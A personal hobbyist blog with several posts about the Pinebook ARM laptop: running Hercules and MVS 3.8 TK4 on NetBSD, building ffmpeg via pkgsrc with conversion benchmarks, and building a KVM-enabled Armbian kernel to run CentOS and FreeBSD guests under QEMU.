The Pinebook is an amazing little piece of hardware, and with the price tag of 100 USD a great way how to learn computer basics and enjoy it in the meantime.

I have decided to cover my experience with NetBSD -current (thanks to Jared McNiell http://www.invisible.ca/arm/) which now runs very well off the microSD cards. Only drawback is that currently you need to use an external USB wireless interface, since the native is not supported by NetBSD yet.

I have been quite busy building pkgsrc packages for this device and upload them regularly here : http://45.76.81.249/pkgsrc/pinebook/netbsd-aarch64/All/

So far I have built quite a number of various emulators that run on the arm64 NetBSD platform, most notably :

• SimH         vax           (VAX OpenVMS 7.3)
• Qemu        ppc64      (AIX 7.2)
• GXemul    mips         (Ultrix 4.5.0)
• DOSBox   i386
• Hercules  ESA/390  (MVS 3.8 )

We will be covering how to setup the Hercules and MVS 3.8 (TK4 system) on the amr64 NetBSD platform.

Assuming we have all in place (NetBSD is running on the Pinebook off microSD and we have an internet connection) following was done:

Compile /usr/pkgsrc/emulators/hercules   from the pkgsrc framework
Since the latest pkgsrc hercules Makefile is for hercules-3.11 we need to change it to something more recent, latest version of Hercules is 3.13 (not considering the Hyperion branch of Hercules 4.0)

So we need to change the  Makefile so that we include the latest version

# vi /usr/pkgsrc/emulators/hercules/Makefile
DISTNAME= hercules-3.13

# make install clean clean-depends

Once we have Hercules built we move on to compile the IBM 3278/3279 terminal emulator for X windows

# cd /usr/pkgsrc/x11/x3270 
# make install clean clean-depends

With these ready we can move on to download the The MVS 3.8j Tur(n)key 4 – System

$ mkdir TK4
$ cd TK4
$ wget http://wotho.ethz.ch/tk4-/tk4-_v1.00_current.zip
$ unzip tk4-_v1.00_current.zip 
$ rm tk4-_v1.00_current.zip
- Remove hercules directory since we are on NetBSD 
$ rm -rf hercules

Next we move on to edit the tk4-.cnf configuration file so we can include 2 CPUs from the Pinebook since it runs on Quad-Core ARM Cortex A53

In the TK4 directory edit the conf/tk4_.cnf  as follows 

CPUSERIAL 000699
CPUMODEL 2064 
NUMCPU:=2 
MAXCPU:=2

We are doing this because TK4 bundle does not ship with NetBSD arm64 binaries obviously and we cannot use the native automatic shell-script loader start_herc

Thanks to the wonderful video blog of Moshix https://www.youtube.com/watch?v=pdtddmdpTZk I have borrowed his idea on running Hercules TK4 on S390x SUSE Linux and translated it to NetBSD arm64 world.

Start hercules

# hercules -f conf/tk4-.cnf

Once in the Hercules prompt we do the following:
We IPL to dasd address 148

Command ==> ipl 148

We do not want automatic IPL of MVS so we start with command 03 because
the TK4 is configured to autoload properly on Intel and we don’t want
some things to run so we use manual load

Command ==> /r 00,cmd=03

"Wait a couple of moments till you see"
HHCCD002I  Writer thread 2 started: tid=Fxxxxxx, pid=xxxxx

We check where we are

Command ==> /d a,l

"We should see 0000 TIME SHARING USERS"

We need to start manually the Job Entry Subsystem 2 before anything else

Command ==> /s jes2

We specify next the startup options

Command ==> /r 00,noreq

"We should see this last line"
$HASP099 ALL AVAILABLE FUNCTIONS COMPLETE

We check if jes2 is up

Command ==> /$da

"If yes we should see" 
$HASP000 NO ACTIVE JOBS

We now start a VTAM which is a job procedure called net

Command ==> /s net

"We should see after a few moments" 
IST093I N1x   ACTIVE    (N07 - N15)

We check where we are

Command ==> /d a,l

And finally launch TSO

Command ==> /s tso

Now it should be a good time to connect to the emulated MVS via x3270

Start x3270 terminal and connect to 127.0.0.1:3270

It is a good idea to read some documentation first before using the MVS :)
http://wotho.ethz.ch/tk4-/MVS_TK4-_v1.00_Users_Manual.pdf

The login details to the TSO are:

Login as herc01 passsword: CUL8TR

To Shut down MVS properly please follow this procedure

Also possible is to run the MTS (Michigan Terminal System)  MTS has been made available to run/test/learn here https://sites.google.com/site/michiganterminalsystem/mts-d60A

To summarize we need to get the following

• A copy of the MTS d6.0A.zip archive is available for download from the MTS Archive (79MB, 18 January 2012).

• An updated version of the hercules.cnf file for use with MTS D6.0A (1KB, 19 January 2012). The update corrects a problem with the case of the simulated disk file, should be mts600.dsk, but was MTS600.dsk.
• In addition to the d6.0A.zip archive, it is recommended that the d6.0.tar.gz archive be downloaded as well since it contains the full set of D6.0 *FS distribution tapes and a number of documentation files that will be useful when using D6.0A. The d6.0.tar.gz archive may be downloaded from http://bitsavers.org/bits/univOfMichigan/mts/d6.0.tar.gz.

A very well documented visual guide is here http://archive.michigan-terminal-system.org/documentation/screenshorts-of-d6-0-and-d6-0a-under-hercules

This is strictly NetBSD evbarm (arm64) Pinebook performance test that I wanted to share if anybody is interested.

Since most of the NetBSD binary packages are built via pkgsrc framework (which can be a lengthy process definitely not for the impatient) I stumbled across the following problems on the pkgsrc -current and pkgsrc-Q3-2018

• /usr/pkgsrc/multimedia/mplayer – fails to compile/build due to some ASM related errors
• /usr/pkgsrc/multimedia/totem – builds but after building a couple of gstreamer codec packages that are essential, it does not play any videos at all
• /usr/pkgsrc/multimedia/xine – fails to compile/build
• /usr/pkgsrc/multimedia/ffmpeg*  (compiles – see notes below)

Now I will briefly describe what I have done with ffmpeg (I believe it is a part of hundred other multimedia software projects etc.) so it would be most probably the best suited candidate to try.

Now if you notice that in the standard pkgsrc Makefiles for any of the versions of ffmpeg2 >  the ffplay configure option is set to disable

CONFIGURE_ARGS+= --disable-ffplay

Since pkgsrc/multimedia/ffmpeg2  ffmpeg3 and ffmpeg4  misbehave slightly during standard builds I have rather built the ffmpeg2 and ffmpeg4 natively (not via pkgsrc framework) and performed some tests (video conversion and video playback)

During the ffmpeg2 pkgsrc configure stage, the scripts barfed out that there is no openssl installed and bailed out. I have used a little “cheat” since I did not want to get into debugging the pkgsrc patchfiles and Makefiles and decided to just ./configure inside the /usr/pkgsrc/multimedia/work/ffmpeg2-xxxx/   and copied all the pkgsrc SDL includes to local /usr/include

 32 -r--r--r--   1 root  wheel   12783 Nov 12 14:19 bozohttpd.h
 16 drwxr-xr-x   2 root  wheel     512 Nov 12 14:19 security
 16 drwxr-xr-x   2 root  wheel     512 Nov 12 14:19 rump
 16 drwxr-xr-x   2 root  wheel    2048 Nov 12 14:58 openssl
 16 drwxr-xr-x  16 root  wheel     512 Nov 28 09:57 ..
 16 -rw-r--r--   1 root  wheel    3233 Dec  8 11:33 SDL.h
 16 -rw-r--r--   1 root  wheel    1933 Dec  8 11:33 SDL_active.h
 32 -rw-r--r--   1 root  wheel   11215 Dec  8 11:33 SDL_audio.h
 16 -rw-r--r--   1 root  wheel     986 Dec  8 11:33 SDL_byteorder.h
 16 -rw-r--r--   1 root  wheel    6048 Dec  8 11:33 SDL_cdrom.h
 32 -rw-r--r--   1 root  wheel    9123 Dec  8 11:33 SDL_config.h
 16 -rw-r--r--   1 root  wheel    2221 Dec  8 11:33 SDL_cpuinfo.h
 16 -rw-r--r--   1 root  wheel    6055 Dec  8 11:33 SDL_endian.h
 16 -rw-r--r--   1 root  wheel    1874 Dec  8 11:33 SDL_error.h
 32 -rw-r--r--   1 root  wheel   13041 Dec  8 11:33 SDL_events.h
 16 -rw-r--r--   1 root  wheel    2607 Dec  8 11:33 SDL_framerate.h
 16 -rw-r--r--   1 root  wheel     979 Dec  8 11:33 SDL_getenv.h
 16 -rw-r--r--   1 root  wheel    4510 Dec  8 11:33 SDL_gfxBlitFunc.h
 32 -rw-r--r--   1 root  wheel   10961 Dec  8 11:33 SDL_gfxPrimitives.h
112 -rw-r--r--   1 root  wheel   55909 Dec  8 11:33 SDL_gfxPrimitives_font.h
 16 -rw-r--r--   1 root  wheel    5513 Dec  8 11:33 SDL_image.h
 32 -rw-r--r--   1 root  wheel   10318 Dec  8 11:33 SDL_imageFilter.h
 16 -rw-r--r--   1 root  wheel    5532 Dec  8 11:33 SDL_joystick.h
 16 -rw-r--r--   1 root  wheel    4098 Dec  8 11:33 SDL_keyboard.h
 16 -rw-r--r--   1 root  wheel    7492 Dec  8 11:33 SDL_keysym.h
 16 -rw-r--r--   1 root  wheel    2739 Dec  8 11:33 SDL_loadso.h
 16 -rw-r--r--   1 root  wheel    2866 Dec  8 11:33 SDL_main.h
 64 -rw-r--r--   1 root  wheel   27739 Dec  8 11:33 SDL_mixer.h
 16 -rw-r--r--   1 root  wheel    4754 Dec  8 11:33 SDL_mouse.h
 16 -rw-r--r--   1 root  wheel    5860 Dec  8 11:33 SDL_mutex.h
 16 -rw-r--r--   1 root  wheel     183 Dec  8 11:33 SDL_name.h
 48 -rw-r--r--   1 root  wheel   18319 Dec  8 11:33 SDL_net.h
672 -rw-r--r--   1 root  wheel  336544 Dec  8 11:33 SDL_opengl.h
 16 -rw-r--r--   1 root  wheel    2708 Dec  8 11:33 SDL_platform.h
 16 -rw-r--r--   1 root  wheel    2009 Dec  8 11:33 SDL_quit.h
 16 -rw-r--r--   1 root  wheel    2960 Dec  8 11:33 SDL_rotozoom.h
 16 -rw-r--r--   1 root  wheel    4958 Dec  8 11:33 SDL_rwops.h
 64 -rw-r--r--   1 root  wheel   25770 Dec  8 11:33 SDL_sound.h
 48 -rw-r--r--   1 root  wheel   16473 Dec  8 11:33 SDL_stdinc.h
 16 -rw-r--r--   1 root  wheel    6319 Dec  8 11:33 SDL_syswm.h
 16 -rw-r--r--   1 root  wheel    4242 Dec  8 11:33 SDL_thread.h
 16 -rw-r--r--   1 root  wheel    4527 Dec  8 11:33 SDL_timer.h
 32 -rw-r--r--   1 root  wheel   10711 Dec  8 11:33 SDL_ttf.h
 16 -rw-r--r--   1 root  wheel     979 Dec  8 11:33 SDL_types.h
 16 -rw-r--r--   1 root  wheel    2637 Dec  8 11:33 SDL_version.h
 80 -rw-r--r--   1 root  wheel   38018 Dec  8 11:33 SDL_video.h
 16 -rw-r--r--   1 root  wheel    5230 Dec  8 11:34 begin_code.h
 16 drwxr-xr-x  58 root  wheel    6144 Dec  8 11:34 .
 16 -rw-r--r--   1 root  wheel    1482 Dec  8 11:34 close_code.h

Next I have placed the .configure_done file inside the /usr/pkgsrc/multimedia/ffmpeg2/work  and after gmake finished I had to add .build_done to work as well as to  tweak the PLIST with the new set of files so it would properly build a pkgsrc binary package

So now I have a fully working ffmpeg2 with ffplay (although the files are quite heavy

 25088 -rwxr-xr-x   1 root  wheel   12721520 Dec  8 23:50 ffmpeg
 24832 -rwxr-xr-x   1 root  wheel   12634352 Dec  8 23:50 ffplay
 24960 -rwxr-xr-x   1 root  wheel   12658928 Dec  8 23:52 ffprobe
 23040 -rwxr-xr-x   1 root  wheel   11681168 Dec  8 23:52 ffserver

So lets do some bench-marking now. For this I have chosen the following youtube video from Samsung https://www.youtube.com/watch?v=8leorFMy0rg

Fetching the above on the Pinebook via youtube-dl produced an MKV file “Samsung Plasma TV Demo Full HD 1080p-8leorFMy0rg.mkv” Matroska data

Playing MKV via ffplay was exxtremely slow I decided to test and convert the file to MP4 via ffmpeg since we already have it built.  Please note that I have used an external USB stick to keep the data since it is much faster than the MicroSD card I run NetBSD off from :)

$ /usr/bin/time -l ffmpeg -i Samsung\ Plasma\ TV\ Demo\ Full\ HD\ 1080p-8leorFMy0rg.mkv -strict -2 -qscale 0 samsung.mp4
built with gcc 6.5.0 (nb4 20181109)
configuration: --prefix=/usr/pkg --mandir=/usr/pkg/man --docdir=/usr/pkg/doc --sysinclude=/usr/pkg/include
libavutil 54. 31.100 / 54. 31.100
libavcodec 56. 60.100 / 56. 60.100
libavformat 56. 40.101 / 56. 40.101
libavdevice 56. 4.100 / 56. 4.100
libavfilter 5. 40.101 / 5. 40.101
libswscale 3. 1.101 / 3. 1.101
libswresample 1. 2.101 / 1. 2.101
Input #0, matroska,webm, from 'Samsung Plasma TV Demo Full HD 1080p-8leorFMy0rg.mkv':
Metadata:
COMPATIBLE_BRANDS: iso6avc1mp41
MAJOR_BRAND : dash
MINOR_VERSION : 0
ENCODER : Lavf56.40.101
Duration: 00:01:47.18, start: 0.007000, bitrate: 1515 kb/s
Stream #0:0(und): Video: h264 (High), yuv420p(tv, bt709), 1920x1080 [SAR 1:1 DAR 16:9], 29.97 fps, 29.97 tbr, 1k tbn, 59.94 tbc (default)
Metadata:
CREATION_TIME : 2018-11-13 09:39:56
LANGUAGE : und
HANDLER_NAME : VideoHandler
DURATION : 00:01:47.140000000
Stream #0:1(eng): Audio: opus, 48000 Hz, stereo, fltp (default)
Metadata:
LANGUAGE : eng
DURATION : 00:01:47.181000000
Please use -q:a or -q:v, -qscale is ambiguous
Output #0, mp4, to 'samsung.mp4':
Metadata:
COMPATIBLE_BRANDS: iso6avc1mp41
MAJOR_BRAND : dash
MINOR_VERSION : 0
encoder : Lavf56.40.101
Stream #0:0(und): Video: mpeg4 ( [0][0][0] / 0x0020), yuv420p, 1920x1080 [SAR 1:1 DAR 16:9], q=2-31, 200 kb/s, 29.97 fps, 30k tbn, 29.97 tbc (default)
Metadata:
CREATION_TIME : 2018-11-13 09:39:56
LANGUAGE : und
HANDLER_NAME : VideoHandler
DURATION : 00:01:47.140000000
encoder : Lavc56.60.100 mpeg4
Stream #0:1(eng): Audio: aac ([64][0][0][0] / 0x0040), 48000 Hz, stereo, fltp, 128 kb/s (default)
Metadata:
LANGUAGE : eng
DURATION : 00:01:47.181000000
encoder : Lavc56.60.100 aac
Stream mapping:
Stream #0:0 -> #0:0 (h264 (native) -> mpeg4 (native))
Stream #0:1 -> #0:1 (opus (native) -> aac (native))

347.74 real 1024.24 user 6.37 sys
125384 maximum resident set size
0 average shared memory size
0 average unshared data size
0 average unshared stack size
30829 page reclaims
0 page faults
0 swaps
0 block input operations
212 block output operations
0 messages sent
0 messages received
0 signals received
41228 voluntary context switches
15818 involuntary context switches

ffmpeg version 2.8.14 Copyright (c) 2000-2018 the FFmpeg developers
built with gcc 6.5.0 (nb4 20181109)

So the above translates to 00:05:47 of clean conversion time using ffmpeg2.

When executed via ffmpeg4

ffmpeg version 4.1 Copyright (c) 2000-2018 the FFmpeg developers
built with gcc 6.5.0 (nb4 20181109)

 329.67 real 1016.10 user 5.38 sys

Which is roughly the same (slightly faster than with ffmpeg2)

I have done exactly the same on my Panasonic Toughbook CF-53 which has
On the Intel(R) Core(TM) i5-3320M CPU @ 2.60GHz (4 cores)

$ time ffmpeg -i Samsung\ Plasma\ TV\ Demo\ Full\ HD\ 1080p-8leorFMy0rg.mkv -strict -2 -qscale 0 samsung.mp4
built with gcc 7 (Ubuntu 7.3.0-16ubuntu3)
  configuration: 
  libavutil      56. 18.102 / 56. 18.102
  libavcodec     58. 21.104 / 58. 21.104
  libavformat    58. 17.101 / 58. 17.101
  libavdevice    58.  4.101 / 58.  4.101
  libavfilter     7. 25.100 /  7. 25.100
  libswscale      5.  2.100 /  5.  2.100
  libswresample   3.  2.100 /  3.  2.100
Input #0, matroska,webm, from 'Samsung Plasma TV Demo Full HD 1080p-8leorFMy0rg.mkv':
  Metadata:
    COMPATIBLE_BRANDS: iso6avc1mp41
    MAJOR_BRAND     : dash
    MINOR_VERSION   : 0
    ENCODER         : Lavf56.40.101
  Duration: 00:01:47.18, start: -0.007000, bitrate: 1515 kb/s
    Stream #0:0(und): Video: h264 (High), yuv420p(tv, bt709, progressive), 1920x1080 [SAR 1:1 DAR 16:9], 29.97 fps, 29.97 tbr, 1k tbn, 59.94 tbc (default)
    Metadata:
      CREATION_TIME   : 2018-11-13 09:39:56
      LANGUAGE        : und
      HANDLER_NAME    : VideoHandler
      DURATION        : 00:01:47.140000000
    Stream #0:1(eng): Audio: opus, 48000 Hz, stereo, fltp (default)
    Metadata:
      LANGUAGE        : eng
      DURATION        : 00:01:47.181000000
Please use -q:a or -q:v, -qscale is ambiguous
Stream mapping:
  Stream #0:0 -> #0:0 (h264 (native) -> mpeg4 (native))
  Stream #0:1 -> #0:1 (opus (native) -> aac (native))
Press [q] to stop, [?] for help
Output #0, mp4, to 'samsung.mp4':
  Metadata:
    COMPATIBLE_BRANDS: iso6avc1mp41
    MAJOR_BRAND     : dash
    MINOR_VERSION   : 0
    encoder         : Lavf58.17.101
    Stream #0:0(und): Video: mpeg4 (mp4v / 0x7634706D), yuv420p, 1920x1080 [SAR 1:1 DAR 16:9], q=2-31, 200 kb/s, 29.97 fps, 30k tbn, 29.97 tbc (default)
    Metadata:
      CREATION_TIME   : 2018-11-13 09:39:56
      LANGUAGE        : und
      HANDLER_NAME    : VideoHandler
      DURATION        : 00:01:47.140000000
      encoder         : Lavc58.21.104 mpeg4
    Side data:
      cpb: bitrate max/min/avg: 0/0/200000 buffer size: 0 vbv_delay: -1
    Stream #0:1(eng): Audio: aac (LC) (mp4a / 0x6134706D), 48000 Hz, stereo, fltp, 128 kb/s (default)
    Metadata:
      LANGUAGE        : eng
      DURATION        : 00:01:47.181000000
      encoder         : Lavc58.21.104 aac

real	0m30,361s
user	1m29,559s
sys	0m0,825s

Which equals 30 seconds, using ffmpeg v. N-91455 on Intel x86_64

Finally I wanted to play the resulting video on the Pinebook via ffplay (ffmpeg2)  and here is the result

Not sharing the playback via ffplay (ffmpeg4) because its too choppy and slow.

First time I’m doing this, here are some statistics for this blog (which originally served only as a backup for general knowledge) -> Happy New Year 2019 !

And here are the actual statistics

So thank you again !

All the best in 2k19 !

Armbian guys are great in what they do with the sunxi64 kernel for the Pinebook. I have been experimenting with the Pinebook for 2 months now and so far I have used the native Ubuntu 18.04 aarch64 distro, NetBSD -current from Jared McNeill (http://www.invisible.ca/arm/) and the Armbian for Pinebook (https://www.armbian.com/pinebook-a64/)

I have so far best experience with the Armbian pinebook-a64 Linux distribution and here I would like to describe the process how to get full KVM support in the Armbian Bionic based on the 4.19.x kernel

Unfortunately the current 4.19.2-sunxi64 kernel does not have KVM virtualisation support enabled so any attempt on running aarch64 virtual machines in QEMU on the Pinebook will be horribly slow.

Installation of the Armbian Stretch 4.19.x distribution is straight forward, and I have used the image that I have transferred to a microSD card  64BG (100 mb/s as minimum speed). All this can be easily done on the current Linux machine via following command

x86_64 LAPTOP

$ wget https://dl.armbian.com/pinebook-a64/Debian_stretch_next.7z
$ su  
# dd if=Armbian_5.69_Pinebook-a64_Debian_stretch_next_4.19.13.img of=/dev/sd(X) <- check what your USB microSD adaper is

Once the image is transferred, please follow the official documentation how to setup Networking and all other things, which I’m not going to cover here. It is straight forward.

So once we have the Pinebook booted and connected to the internet, make sure you get all packages updated

aarch64 PINEBOOK

# apt-get update
# apt-get upgrade

we can go on and install latest Qemu, so for this we need to enable the testing repository in /etc/apt/sources.list

aarch64 PINEBOOK

root@pinebook:/etc/apt# cat sources.list
deb http://httpredir.debian.org/debian  testing main contrib non-free
#deb-src http://httpredir.debian.org/debian stretch main contrib non-free

deb http://httpredir.debian.org/debian stretch-updates   main contrib non-free
#deb-src http://httpredir.debian.org/debian stretch-updates main contrib non-free

deb http://httpredir.debian.org/debian stretch-backports  main contrib non-free
#deb-src http://httpredir.debian.org/debian stretch-backports main contrib non-free

deb http://security.debian.org/ stretch/updates testing main contrib non-free
#deb-src http://security.debian.org/ stretch/updates main contrib non-free

deb http://httpredir.debian.org/debian jessie main contrib non-free

So next we can install qemu-system which will pull all softmmu suport (x86,sparc,ppc,mips,arm) but for accelerated qemu emulation we obviously need only the qemu-system-arm (this includes both qemu-system-arm and qemu-system-aarch64)   We will also need to install qemu-utils and qemu-efi-aarch64

aarch64 PINEBOOK

# apt-get install qemu-system qemu-efi-aarch64

So now we are ready to build our customized Armbian Stretch kernel 4.19.x based on mainline, since the stock one does not include KVM support.

So for this I have followed this guide https://docs.armbian.com/Developer-Guide_Build-Preparation/

What we will need is the following:

• Host x86_64 Linux system capable of running VirtualBox (6.0) with 8GB RAM and at least 50 GB disk space available
• Configured and working VirtualBox (I have used 6.0 https://download.virtualbox.org/virtualbox/6.0.0/virtualbox-6.0_6.0.0-127566~Ubuntu~bionic_amd64.deb )
• Exactly this version of Ubuntu 18.04 http://archive.ubuntu.com/ubuntu/dists/bionic/main/installer-amd64/current/images/netboot/mini.iso

I have used the following config on my Linux Mint 19.1 – make sure you create a large enough VDI disk to hold all the build files, minimum is 20 GB, 50 GB is recommended.

Also Im using the following host-only-adapter network setup so that I can access the VM from my host and vice-versa easily via ssh/scp

For this to work I have a following network configuration script I run after I start VirtualBox manager (to get the vboxnet0 interface registered first)

x86_64 LAPTOP

root@panasonic:/home/user# cat networking.sh 
#Setup tap and bridge 
tunctl -t tap0 -u user
ifconfig tap0 up
brctl addbr br0
brctl addif br0 vboxnet0 
brctl setfd br0 0
ifconfig br0 10.0.2.2 netmask 255.255.255.0 broadcast 10.0.2.255 up
brctl addif br0 tap0 vboxnet0 
ifconfig tap0 0.0.0.0
sysctl net.ipv4.ip_forward=1
iptables --table nat -A POSTROUTING --out-interface wlan0 -j MASQUERADE

Internal IP address for the Guest VMs are always static in the following format

IP:      10.0.2.10-200 
Gateway: 10.0.2.2 DNS:     8.8.8.8  or 1.1.1.1

Setup the OpenSSH server and configure the network on the Guest Ubuntu VM accordingly.

So once we have everything ready we can  start preparing the Guest Ubuntu VM  for the kernel build

Login, elevate to root and run

VirtualBox Ubuntu GUEST

# apt-get -y -qq install git
# git clone --depth 1 https://github.com/armbian/build
# cd build

And run the compile.sh script

VirtualBox Ubuntu GUEST

# ./compile.sh

Select to build U-boot and  Kernel packages

Choose to show Kernel options so that we can enable the KVM support

Choose Pinebook-a64

After a while you should come to the Kernel menuconfig

Make sure to set the following Virtualisation option on (space bar)

And the following subsection should be enabled as built-on and modules

After some time the kenrel packages would be made available in the following directory which we will scp out of the VirtualBox VM and transfer to the Pinebook via scp

Back on the Pinebook we need to install these packages via apt

aarch64 PINEBOOK 

-rw-r--r-- 1 user user 44152 Jan 11 23:36 linux-dtb-next-sunxi64_5.70_arm64.deb
-rw-r--r-- 1 user user 10422904 Jan 11 23:35 linux-headers-next-sunxi64_5.70_arm64.deb
-rw-r--r-- 1 user user 16571572 Jan 11 23:35 linux-image-next-sunxi64_5.70_arm64.deb
-rw-r--r-- 1 user user 320580692 Jan 11 23:36 linux-source-next-sunxi64_5.70_all.deb
-rw-r--r-- 1 user user 246032 Jan 11 23:35 linux-u-boot-next-pinebook-a64_5.70_arm64.deb

# dpkg -i linux-dtb-next-sunxi64_5.70_arm64.deb
# dpkg -i linux-headers-next-sunxi64_5.70_arm64.deb
# dpkg -i linux-image-next-sunxi64_5.70_arm64.deb

Reboot the Pinebook to load the new KVM enabled Kernel, once up we should verify we are running the new Kernel

aarch64 PINEBOOK

root@pinebook:/home/user# uname -a
Linux pinebook 4.19.13-sunxi64 #5.70 SMP Sat Jan 12 00:10:12 CET 2019 aarch64 GNU/Linux
root@pinebook:/home/user#

Next we prepare the virtualisation environment where we want to run Centos 7.6

Before we actually load QEMU on the Pinebook we need to modify slightly the stock /etc/qemu-ifup script as follows

#! /bin/sh
# Script to bring a network (tap) device for qemu up.
# The idea is to add the tap device to the same bridge
# as we have default routing to.

# in order to be able to find brctl
PATH=$PATH:/sbin:/usr/sbin
ip=$(which ip)

if [ -n "$ip" ]; then
ip link set "$1" up
else
brctl=$(which brctl)
if [ ! "$ip" -o ! "$brctl" ]; then
echo "W: $0: not doing any bridge processing: neither ip nor brctl utility not found" >&2
exit 0
fi
ifconfig "$1" 0.0.0.0 up
fi

switch=$(ip route ls |
awk '/^default / {
for(i=0;i<NF;i++) { if ($i == "dev") { print $(i+1); next; } }
}'
)

switch=br0

# only add the interface to default-route bridge if we
# have such interface (with default route) and if that
# interface is actually a bridge.
# It is possible to have several default routes too
for br in $switch; do
if [ -d /sys/class/net/$br/bridge/. ]; then
if [ -n "$ip" ]; then
ip link set "$1" master "$br"
else
brctl addif $br "$1"
fi
exit # exit with status of the previous command
fi
done

echo "W: $0: no bridge for guest interface found" >&2

And prepare the following “network” helper script to enable internet connection sharing bethween Host and Quest on the Pinebook

You will however need to install some tools first for this to work

aarch64 PINEBOOK 
# apt-get install uml-utilities
# apt-get install bridge-utils

And then finally save below shell script, make it executable and run it

#Setup tap and bridge 
tunctl -t tap0 -u user
ifconfig tap0 up
brctl addbr br0
brctl setfd br0 0
ifconfig br0 10.0.2.2 netmask 255.255.255.0 broadcast 10.0.2.255 up
brctl addif br0 tap0 
ifconfig tap0 0.0.0.0
sysctl net.ipv4.ip_forward=1
iptables --table nat -A POSTROUTING --out-interface wlan0 -j MASQUERADE

Load the above script each time you boot the Pinebook if you wish to run Qemu.

On the Pinebook prepare a directory to hold some files, we will be using the linaro UEFI image

aarch64 PINEBOOK 

$ mkdir -p ~/KVM/centos
$ cd ~/KVM/centos
$ wget http://mirror.vpsnet.com/centos-altarch/7.6.1810/isos/aarch64/CentOS-7-aarch64-Minimal-1810.iso
$ mv CentOS-7-aarch64-Minimal-1810.iso centos.iso
$ wget http://snapshots.linaro.org/components/kernel/leg-virt-tianocore-edk2-upstream/latest/QEMU-AARCH64/RELEASE_GCC5/QEMU_EFI.img.gz
$ gunzip QEMU_EFI.img.gz 
$ qemu-img create -f qcow2 centos.img 50G 
$ qemu-img create -f qcow2 varstore.img 64M

And next we prepare the qemu loader shell script for this simulation in the KVM/centos working directory and make it executable

/usr/bin/qemu-system-aarch64 \
-cpu host -M virt,accel=kvm -m 1024 -nographic \
-drive if=pflash,format=raw,file=QEMU_EFI.img \
-drive if=pflash,file=varstore.img \
-drive if=virtio,file=disk.img \
-drive if=virtio,format=raw,file=centos.iso \
-net nic -net tap

This is it, and you should be able to fully emulate with almost native speed CentOS 7.6 aarch64 on the Debian 9.6 aarch64 Pinebook

Configuration of CentOS is pretty standard.

FreeBSD 13 aarch64

The above method also works for FreeBSD 13 aarch64  ( http://ftp.freebsd.org/pub/FreeBSD/snapshots/arm64/aarch64/ISO-IMAGES/13.0/FreeBSD-13.0-CURRENT-arm64-aarch64-PINEBOOK-20190110-r342911.img.xz ) except the qemu loader is slightly different

/usr/bin/qemu-system-aarch64 \
-cpu host -M virt,accel=kvm -m 1024 -nographic \
-drive if=pflash,format=raw,file=QEMU_EFI.img \
-drive if=pflash,file=varstore.img \
-drive if=virtio,file=freebsd.img \
-net nic -net tap

Where the freebsd.img is the downloaded img file from the above URL

P.S to save up some space on the default image  rm -rf /usr/lib/debug

To use secondary disk vtblk1 use this loader script (and create disk2.img qcow2 image first)

/usr/bin/qemu-system-aarch64 \
-cpu host -M virt,accel=kvm -m 1024 -nographic \
-drive if=pflash,format=raw,file=QEMU_EFI.img \
-drive if=pflash,file=varstore.img \
-drive if=virtio,bus=0,unit=0,format=raw,file=freebsd.img \
-drive if=virtio,bus=0,unit=1,format=raw,file=disk2.img \
-net nic -net tap

Here is a dmesg from FreeBSD 13 aarch64 running under KVM qemu-system-aarch64 on Debian 9.6 aarch64 Pinebook

root@pinebook:/home/user/KVM/FreeBSD# ssh 10.0.2.11
Password for root@freebsd:
Last login: Sun Jan 13 22:56:36 2019
FreeBSD 13.0-CURRENT r342911 GENERIC

Welcome to FreeBSD!

root@freebsd:~ # dmesg
---<<BOOT>>---
KDB: debugger backends: ddb
KDB: current backend: ddb
Copyright (c) 1992-2019 The FreeBSD Project.
Copyright (c) 1979, 1980, 1983, 1986, 1988, 1989, 1991, 1992, 1993, 1994
The Regents of the University of California. All rights reserved.
FreeBSD is a registered trademark of The FreeBSD Foundation.
FreeBSD 13.0-CURRENT r342911 GENERIC arm64
FreeBSD clang version 7.0.1 (tags/RELEASE_701/final 349250) (based on LLVM 7.0.1)
WARNING: WITNESS option enabled, expect reduced performance.
VT: init without driver.
KLD file umodem.ko is missing dependencies
FreeBSD/SMP: Multiprocessor System Detected: 1 CPUs
random: unblocking device.
random: entropy device external interface
MAP 785d0000 mode 2 pages 64
MAP 78610000 mode 2 pages 160
MAP 786b0000 mode 2 pages 160
MAP 7bc20000 mode 2 pages 400
MAP 7bdb0000 mode 2 pages 592
MAP 4000000 mode 0 pages 16384
MAP 9010000 mode 0 pages 1
kbd0 at kbdmux0
efirtc0: <EFI Realtime Clock>
efirtc0: registered as a time-of-day clock, resolution 1.000000s
acpi0: <BOCHS BXPCFACP>
acpi0: Power Button (fixed)
acpi0: Sleep Button (fixed)
psci0: <ARM Power State Co-ordination Interface Driver> on acpi0
gic0: <ARM Generic Interrupt Controller> iomem 0x8000000-0x8000fff,0x8010000-0x8010fff on acpi0
gic0: pn 0x2, arch 0x2, rev 0x1, implementer 0x43b irqs 288
gic0: frame: 0 8020000 1 64 80
gicv2m0: <ARM Generic Interrupt Controller MSI/MSIX> mem 0x8020000-0x8020fff on gic0
generic_timer0: <ARM Generic Timer> irq 34,35,36 on acpi0
Timecounter "ARM MPCore Timecounter" frequency 24000000 Hz quality 1000
Event timer "ARM MPCore Eventtimer" frequency 24000000 Hz quality 1000
cpu0: <ACPI CPU> on acpi0
uart0: <PrimeCell UART (PL011)> iomem 0x9000000-0x9000fff irq 0 on acpi0
uart0: console (9600,n,8,1)
virtio_mmio0: <VirtIO MMIO adapter> iomem 0xa000000-0xa0001ff irq 1 on acpi0
virtio_mmio1: <VirtIO MMIO adapter> iomem 0xa000200-0xa0003ff irq 2 on acpi0
virtio_mmio2: <VirtIO MMIO adapter> iomem 0xa000400-0xa0005ff irq 3 on acpi0
virtio_mmio3: <VirtIO MMIO adapter> iomem 0xa000600-0xa0007ff irq 4 on acpi0
virtio_mmio4: <VirtIO MMIO adapter> iomem 0xa000800-0xa0009ff irq 5 on acpi0
virtio_mmio5: <VirtIO MMIO adapter> iomem 0xa000a00-0xa000bff irq 6 on acpi0
virtio_mmio6: <VirtIO MMIO adapter> iomem 0xa000c00-0xa000dff irq 7 on acpi0
virtio_mmio7: <VirtIO MMIO adapter> iomem 0xa000e00-0xa000fff irq 8 on acpi0
virtio_mmio8: <VirtIO MMIO adapter> iomem 0xa001000-0xa0011ff irq 9 on acpi0
virtio_mmio9: <VirtIO MMIO adapter> iomem 0xa001200-0xa0013ff irq 10 on acpi0
virtio_mmio10: <VirtIO MMIO adapter> iomem 0xa001400-0xa0015ff irq 11 on acpi0
virtio_mmio11: <VirtIO MMIO adapter> iomem 0xa001600-0xa0017ff irq 12 on acpi0
